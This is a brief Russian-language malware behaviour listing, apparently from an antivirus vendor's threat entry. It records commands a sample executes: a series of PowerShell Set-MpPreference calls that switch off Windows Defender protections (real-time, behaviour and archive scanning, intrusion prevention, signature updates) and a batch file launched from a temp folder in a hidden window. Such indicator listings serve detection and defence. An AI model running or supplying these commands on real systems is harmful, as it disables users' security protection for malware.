Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIOAVProtection $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
- %TEMP%\9c18.tmp\9c19.tmp\9c1a.bat
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\9C18.tmp\9C19.tmp\9C1A.bat <Полный путь к файлу>" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBehaviorMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisablePrivacyMode $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableArchiveScanning $true"